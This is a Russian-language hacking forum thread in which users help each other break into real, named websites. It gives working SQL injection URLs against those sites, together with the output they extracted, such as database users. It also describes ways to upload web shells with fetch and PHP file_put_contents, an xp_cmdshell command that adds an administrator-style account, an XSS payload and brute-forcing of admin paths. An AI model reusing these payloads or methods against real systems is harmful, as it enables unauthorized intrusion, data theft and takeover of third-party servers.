1. Есть туча сайтов, которые хексят.
2. Вы вообще ссылку смотрели?
3. Есть табла mysql.user.. но...

MirA
Забавно, действительно фильтрация "_"
Есть очень большая вероятность того, что user под которым работает база, file_priv=Y
http://www.rncb.ru/print_view.php?id=450&fpath=-2+union+select+1,2,3,UNHEX(HEX(user())),5,6,7,8,9, 10,11,12,13+from+mysql.user+--+
root@localhost

Прочитать файлы мы не сможем, т.к LOAD_FILE, и посмотреть тоже , т.к file_priv, а вот записать ... :)

Тоесть ищем папку на запись, и пробуем :)

PS
prescott,wildshaman Зачем вообще это писать?

Скажите что за ошибка 1 - Can't create/write to file '/home/localhost/www/1.txt' (Errcode: 2)
з.ы. в гугл не посылать,парсил)

"Errcode 2" означает, что папка не существует.

Путь сам что-ли придумывал? ^^

Скажите что за ошибка 1 - Can't create/write to file '/home/localhost/www/1.txt' (Errcode: 2)
з.ы. в гугл не посылать,парсил)
нет прав на запись или путь не правильный

Нет прав - это "Errcode: 13"

Помогите пожалуйста разобраться, вот нашел иньекцию http://www.rfrap.ru/site/index.php?p=16;'
при попытке подобрать количество полей вылезает
Не могу выполнить запрос к БД1syntax error near '' at line 1 подозреваю, что это 3 версия мускуля и похоже blind SQL-injection, а так вообще хз, просто я никогда не встречался с этим....

че за фигня?) в httpd.conf прописано DocumentRoot "/usr/local/apache/htdocs"
а в /usr/local/apache/htdocs файлы index.html на разных языках и папка manual. походу это от установки апача но самого сайта нет(( как так?)

подозреваю, что это 3 версия мускуля
Правильно подозреваешь
http://www.rfrap.ru/site/index.php?p=16+and+substring(version(),1,1)=3
Вот материал по проведению инъекций в третьей ветке
https://forum.antichat.ru/showpost.php?p=565034&postcount=4

Подскажите хорошую прогу которая брутит путь к админке, а то угадать самому не получается, или хотябы список самых распространенных путей.

в паблике нет, но не сложно самому написать (просто проверяешь заголовки на ошибки 404 и т.д.)

в паблике нет, но не сложно самому написать (просто проверяешь заголовки на ошибки 404 и т.д.)

Это понятно, но брутить простым перебором придется оченб долго, все равно надо словари...

Подскажите хорошую прогу которая брутит путь к админке, а то угадать самому не получается, или хотябы список самых распространенных путей.

Используй сканеры. К примеру Web Vulnerability Scanner или jsky.

http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+or+1=(select+top+1+@@version)--&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
как быть?

кто подстажет каким методом можна залить сюда нормальный шелл?
http://forum.fwuo.ru/ajax.php?vital=pwd

и еще.. нужны кодеры который могуть писать сплоиты!

как быть?
здесь MS Access, нужно подбирать таблицу наугад
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+FROM+%60MSysO bjects%60%00&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
доступа к MSysObjects нет

кто подстажет каким методом можна залить сюда нормальный шелл?
http://forum.fwuo.ru/ajax.php?vital=pwd
с помощью команды fetch
fetch -p [src] -O [out]

[Raz0r]
спс за msa

фетч пробвал... чтото не проканало) еще попробую.. елси нет есть еще варианты?

как вариант выполнить пхп-код:
php -r "file_put_contents($out,file_get_contents($src));"

доброй ночи, есть вопрос, возможно глупый, но для меня важный.
если я войду на определенный сайт под своим аккаунтом, а затем запущу скрипт на веб-сервере своего компьютера (в том же браузере), который задаст значение переменной и проинклудит скрипт с того сайта, чтобы он увидел эту переменную как глобальную, то будет ли при этом инклуде доступна моя текущая сессия?

доброй ночи, есть вопрос, возможно глупый, но для меня важный.
если я войду на определенный сайт под своим аккаунтом, а затем запущу скрипт на веб-сервере своего компьютера (в том же браузере), который задаст значение переменной и проинклудит скрипт с того сайта, чтобы он увидел эту переменную как глобальную, то будет ли при этом инклуде доступна моя текущая сессия?
если SSID в куках - да.

спасибо за ответ, PHPSESSID в соответствующем куке есть, значит должно сработать :)

Ваше не паленая такая ошибка)) а дальше что?
http://www.landisgyr.eu/en/pub/about/news.cfm?news_ID=-1350')+union+select+@@version--

Ребята, подскажите, как дальше, че-то не соображу:
http://www.naturalbodycare-nz.com/shop/list.php?ca_id=123'

Octave_Parango, четвертая ветка, union почему-то не съедает.

Ребята, подскажите, как дальше, че-то не соображу:
http://www.naturalbodycare-nz.com/shop/list.php?ca_id=123)+UniOn+SelEct+1,2,concat_ws(0x3 a,version(),user(),database()),4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*

standard:bodynz_admin@localhost:bodynz_shop

Ваше не паленая такая ошибка)) а дальше что?
а чем проблемма то? ))
http://www.landisgyr.eu/en/pub/about/news.cfm?news_ID=-1350')+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMAT ION_SCHEMA.TABLES)--

Кто знает,в чём причина ?

(select+system_user)-- - Выводит страницу,но в гайде было сказано про
system_user(),а не system_user,но вот 1+and+1=system_user-- (Без скобок) работает.Может,я и делал неправильно,но так работает.CHAR(),к сожалению,тоже не работает.

(select+syssdlfkf_user) - Пишет ошибку

Значит,system_user существует.

LIMIT не работает,но можно через нот ин:

(select+column_name from information_schema.columns+where+table_name+not+in +(0x7573657273)-- не катит.Как потом выяснилось,с hex() тоже.

(select+column_name+from+information_schema.column s+where+table_name+not+in+(char(117)+char(115)+cha r(101)+char(114)+char(115)))

Тоже не катит.Через ТОР тоже.

db_name() работает,но не в форме (select+db_name()),а как условие:

1+and+1=db_name()

Выяснил,что всего там 12 баз данных.Сразу вспомнился гайд по эксплуатации MsSql inj здесь,на форуме.Теперь вопросы:
1)В information_schema.tables содержатся таблицы от всех 12-и баз ?На одном сервере эти таблицы или могут быть на нескольких серверах ?

2)Каков правильный синтаксис процедур в MsSql ?

3)Как выбрать поле из определённой таблицы через ТОР,как это было в случае таблиц ?

ЗЫ: Мучал сервер Microsoft SQL Server 2005 на винде со вторым сервис паком.Судя по ошибке - одноядерный )В качестве системного юзера стоит 'sa',так что на процедуры забивать пока не собираюсь )))

Ппц.. я не знаю, что за "гайд" ты там читал... Но...

(select+column_name from information_schema.columns+where+table_name+not+in +(0x7573657273)--

Ты понимаешь, что это за запрос?

Перевожу:

Выбрать имя колонки из information_schema, где имя таблицы не 0x7573657273.

Если хочешь выводить колонки из таблиц:

(select+top+1+column_name+from+information_schema. columns+where+table_name='таблица'+and+COLU MN_NAME+not+in+('колонка','колонка2' ))--

Вот гайд, читай.

http://forum.antichat.ru/thread30501.html

more 1 row, mssql не поддерживает limit либо top либо between
1 на одном
2 create procedure() begin ... end, select procedure()
3 top 1 column_name from information_schema.columns where table_name='x'

как бы спрашивал но вопрос теперь в другом) есть mysql-inj с файл_прив=У) при попытке прочитать папку с сайтом ничего не показывает хотя содержимое других папок отображает) как и файлов) может ли быть так что для мускула нет прав прочитать файл или содержимое папки?

да либо не хватает прав либо не верно указан путь.

Ругается он на кавычки и никакие where= не прокатят+на HEX ругается,и интересно,как я колонки буду выбирать,если я их не знаю.Колонка1,колонка2...жес� �ь

Ругается он на кавычки и никакие where= не прокатят+на HEX ругается,и интересно,как я колонки буду выбирать,если я их не знаю.Колонка1,колонка2...жес� �ь
дай урл, думаю многое станет ясным

Выше, с помощью запроса, который составил l1ght - получаешь первую колонку, а потом not in.

А ещё лучше - кинуть ссылку.

3 top 1 column_name from information_schema.columns where table_name='x'

(select+top+1+column_name+from+information_schema. columns+where+table_name='users')--

Не работает )

ЗЫ: Не получается составить процедуру к БД =_=.

Типо такой:

xp_cmdshell [NET USER hack password /ADD]

1+and+1=(select+xp_cmdshell+[NET USER help password /ADD])--

Что-то вроде такоого ).Преобразовывал и в хекс,и в юрл, и наоборот.

А что пишет-то?
Хексил users без ковычки?

(select+top+1+column_name+from+information_schema. columns+where+table_name=CHAR(117)+CHAR(115)+CHAR( 101)+CHAR(114)+CHAR(115))--
В гете нужно + на %2B менять
(select+top+1+column_name+from+information_schema. columns+where+table_name=CHAR(117)%2BCHAR(115)%2BC HAR(101)%2BCHAR(114)%2BCHAR(115))--

Почему когда делаешь вот так -
http://www.forestforum.ru/index.php?page=3+order+by+9--
то есть несуществующая колонка. Пишет, что колонки такой нет..
Потом когда подбираешь количество колонок
http://www.forestforum.ru/index.php?page=3+order+by+6--
структура запроса уже другая и видно, что колонок вроде как 4.
Однако когда делаешь селект - то пишется, что The used SELECT statements have a different number of columns
http://www.forestforum.ru/index.php?page=3+union+select+1,2,3,4--

Почему так?

попугай
http://www.forestforum.ru/index.php?page=-3+union+select+1,2,3,4,5,version()--

Там не один запрос

:confused: Есть xss (https://www.wow-europe.com/en/search/searchResults.xml?q=<script>alert()</script>) (работает только в Опере). Заточить под IE ни как не вышло... :( Помогите плз :(

Зашибись, а теперь наверное надо построчно угадывать код твоего css?:)

И вообще, http://forum.antichat.ru/thread43254.html

Зашибись, а теперь наверное надо построчно угадывать код твоего CSS?:)

И вообще, http://forum.antichat.ru/thread43254.html

это скриптинг

Вопрос: Почему у меня включена директива expose_php и показывается версия интерпретатора РНР,а на http://education.ucsc.edu/phpinfo.php - нет ?

17+and+1=(select+top+1+column_name+from+informatio n_schema.columns+where+table_name=CHAR(117)%2bCHAR (115)%2bCHAR(101)%2bCHAR(114)%2bCHAR(115))--

При запросе выдаёт страницу,но нету ни ошибки,ни вывода из базы.

Ответ : всё там отлично показывает
X-Powered-By: PHP/5.1.6

Велемир Давай ссылки на инъёкции, гадания растягиваются на 5 страниц

Ну,я имел ввиду запрос:

http://localhost/script.php%27

У меня вот такой вопрос,как можно изменить права докуменка на опший доступ (chmod 777) есле у меня есть только доступ к файлам на сайте через шелл и доступ к MySQL???

Ребята, такой вопрос.
Заливаю шелл через phpmyadmin
Выскакивает ошибка:
#1 - Can't create/write to file 'полный путь до папки/shell.php' (Errcode: 2)

В чем косяк? чмода не хвататет? или путь не правильный?
или еще чего-то?

Ребята, такой вопрос.
Заливаю шелл через phpmyadmin
Выскакивает ошибка:


В чем косяк? чмода не хвататет? или путь не правильный?
или еще чего-то?
а почему ты думаешь что mysql на той же машине находится?)